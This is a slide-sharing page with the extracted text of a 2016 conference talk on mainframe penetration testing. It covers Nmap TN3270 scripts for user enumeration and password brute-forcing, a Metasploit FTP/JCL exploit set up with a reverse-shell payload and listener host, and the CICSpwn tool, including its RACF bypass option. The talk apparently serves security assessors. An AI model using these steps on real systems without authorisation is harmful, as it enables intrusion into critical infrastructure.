TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc
 

Recently uploaded (20)

[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps Productivity
 
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cf
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and Insight
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 

Advanced mainframe hacking

  • 1. VANGUARD SECURITY & COMPLIANCE 2016 Philip Young ZedSec 390 CST08 Advanced Mainframe Hacking SECURITY & COMPLIANCE CONFERENCE 2016
  • 2. VANGUARD SECURITY & COMPLIANCE 2016 Disclaimer I’m not here in the name of or on behalf of my employer. All opinions expressed here are my own.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13. VANGUARD SECURITY & COMPLIANCE 2016 Purpose This session will: • Go over the tools introduced in Mondays keynote • Explain what’s going on behind the scenes • Show you how to use the tools
  • 14. VANGUARD SECURITY & COMPLIANCE 2016 Tools Covered • Nmap • Metasploit • CICSpwn • ELV.APF
  • 15. VANGUARD SECURITY & COMPLIANCE 2016 Platform • Linux (Kali Linux) • Vmware • macOS • VPS
  • 16. VANGUARD SECURITY & COMPLIANCE 2016 Kali Linux • A Linux distribution • Comes pre-loaded with multiple tools: • BURP • Metasploit • BeeF • Many more
  • 17.
  • 18. DEMO
  • 19.
  • 20. VANGUARD SECURITY & COMPLIANCE 2016 Nmap • Created in 1997 • By: Fyodor • Mostly ‘C’ • Includes Service Detection • Added Scripting Engine in ‘07
  • 21. VANGUARD SECURITY & COMPLIANCE 2016 Nmap • Network MAP • Uses various techniques to discover open ports • E.G. “Syn Scan”
  • 22. VANGUARD SECURITY & COMPLIANCE 2016 Service Probes • Identify what is running on a port • Uses TCP/UDP probes
  • 23. VANGUARD SECURITY & COMPLIANCE 2016 Nmap Probes • Use the flag: ‘-sV’ • Null Probe: Matches data sent to Nmap • Approx 4,000 ‘Null Probes’ Let’s look at TN3270*: match tn3270 m|^xffxfdx1d| p/IBM Telnet TN3270/ i/3270-REGIME/ * line 4606 in nmap-service-probes
  • 24. VANGUARD SECURITY & COMPLIANCE 2016 TN3270 Null Probe match -> ‘Match the following’ Tn3270 -> ‘with tn3270’ m|^xffxfdx1d| xffxfdx1d = IAC DO TN3270E p/IBM Telnet TN3270/ = Set to ‘IBM Telnet…’
  • 25.
  • 26. VANGUARD SECURITY & COMPLIANCE 2016 Other Probes • TCP Probes • Send Data, inspect reply • For example Network Job Entry Probe:
  • 27.
  • 28. VANGUARD SECURITY & COMPLIANCE 2016 NJE Probe • Sends an invalid NJE ‘OPEN’ packet • Waits for either ‘ACK’ or ‘NAK’ in EBCDIC
  • 31. VANGUARD SECURITY & COMPLIANCE 2016 Nmap Scripting Engine (NSE) • Composed of Libraries and scripts • Over 530 scripts available • 121 Libraries • Uses Lua
  • 32. VANGUARD SECURITY & COMPLIANCE 2016 NSE Categories AUTH BROADCAST BRUTE DEFAULT DISCOVERY DOS EXPLOIT EXTERNAL FUZZER INTRUSIVE MALWARE SAFE VERSION VULN
  • 33. VANGUARD SECURITY & COMPLIANCE 2016 TN3270 NSE Library • A ‘virtual’ TN3270 terminal written in Lua • Available: https://github.com/ zedsec390/NMAP • Allows for the following:
  • 34. VANGUARD SECURITY & COMPLIANCE 2016 Invoke • To invoke scripts use the flag --script ( is line continuation in linux) nmap -sV --script tn3270-screen
  • 35.
  • 36. VANGUARD SECURITY & COMPLIANCE 2016 Additional TN3270 Scripts • VTAM Applid Enumeration • TSO: • User ID EnumeraFon • Password Brute Force • CICS: • TransacFon EnumeraFon • User ID EnumeraFon • User Password Brute Forcing
  • 37. VANGUARD SECURITY & COMPLIANCE 2016 Additional TN3270 Scripts • VTAM Applid Enumeration • TSO: • User ID EnumeraFon • Password Brute Force • CICS: • TransacFon EnumeraFon • User ID EnumeraFon • User Password Brute Forcing
  • 38. VANGUARD SECURITY & COMPLIANCE 2016 TSO User Enumeration • Let’s walk through the arguments: •  Note the Libraries: brute & unpwdb Argument Defini5on brute.maxthreads=100 Max number of concurrent connecFons. Set to 100. userdb=‘/tmp/users.txt’ File with usernames you want to test. tso-enum.commands=‘TSOL5’ The command used to get to TSO.
  • 39. VANGUARD SECURITY & COMPLIANCE 2016 CICS Transaction Enumeration Argument Defini5on brute.maxthreads=100 Max number of concurrent connecFons. Set to 100. idlist=‘/tmp/users.txt’ File with CICS transacFons you’re looking for. cics-enum.commands=‘CICSTS29’ The command used to get to the CICS region. cics-enum.path=‘/home/test’ Successfully idenFfied transacFon screenshots will be placed in this folder.
  • 40. DEMO
  • 41.
  • 42. VANGUARD SECURITY & COMPLIANCE 2016 Metasploit Framework • Developed by H.D. Moore 2003 • Moved to Ruby in 2007 • Created an easy to use exploit platform • Chad Rikansrud (@bigendiansmalls) add JCL and z/OS architecture support in 2016
  • 43. VANGUARD SECURITY & COMPLIANCE 2016 Using MSF • Run ‘msfconsole’ • To list all exploits: show exploits • Run the ONLY z/os ‘exploit’ use exploit/mainframe/ftp/ftp_jcl_creds • Show the options with: show options • Fill in the options you need • Select which ‘payload’ you want to use
  • 44. VANGUARD SECURITY & COMPLIANCE 2016 Set options • Exploit options: Op5on Defini5on FTPUSER User ID to use. FTPPASS Password to use. RHOST FTP Hostname/IP address of target LPAR RPORT FTP port (use Nmap)
  • 45. VANGUARD SECURITY & COMPLIANCE 2016 Metasploit Payload Options Now select a payload: set payload cmd/mainframe/reverse_shell_jcl Change the payload options: Op5on Defini5on LHOST Our Hostname or IP address LPORT The port you want metasploit to open a listener on.
  • 46. DEMO
  • 47.
  • 48.
  • 49. VANGUARD SECURITY & COMPLIANCE 2016 CICSpwn • Release this year by Ayoul • Relies on CEMT/CEDA transaction IDs (for now) • Uses CEMT to upload and execute JCL/REXX • Can be used to assess CICS and break in to environments • Requires Python 2.7
  • 50. VANGUARD SECURITY & COMPLIANCE 2016 Interesting Options Invoke with: python cicspwn Flag Defini5on -i Gather informaFon -A Test all opFons -s Upload JCL to be executed by CICS user (requires CEMT) --bypass Will bypass RACF if CEDA is available.
  • 51. DEMO
  • 52.
  • 54. VANGUARD SECURITY & COMPLIANCE 2016 Escalation • So far only network based • What happens after access is granted?
  • 55. VANGUARD SECURITY & COMPLIANCE 2016 Some Ideas • Storage ‘scrapers’ to gather system information (think ‘IPLINFO’ but built in to metasploit) • Automated APF tools to attempt privilege escalation through zapping APF authorized modules • Data dumping tools to grab all datasets • SMP/E corruption
  • 56. VANGUARD SECURITY & COMPLIANCE 2016 Why Not? • Make your own tools? I’d prefer the tools come with what the experts need, so they have it without knowing about it
  • 58. VANGUARD SECURITY & COMPLIANCE 2016 Thank you! SECURITY & COMPLIANCE CONFERENCE 2016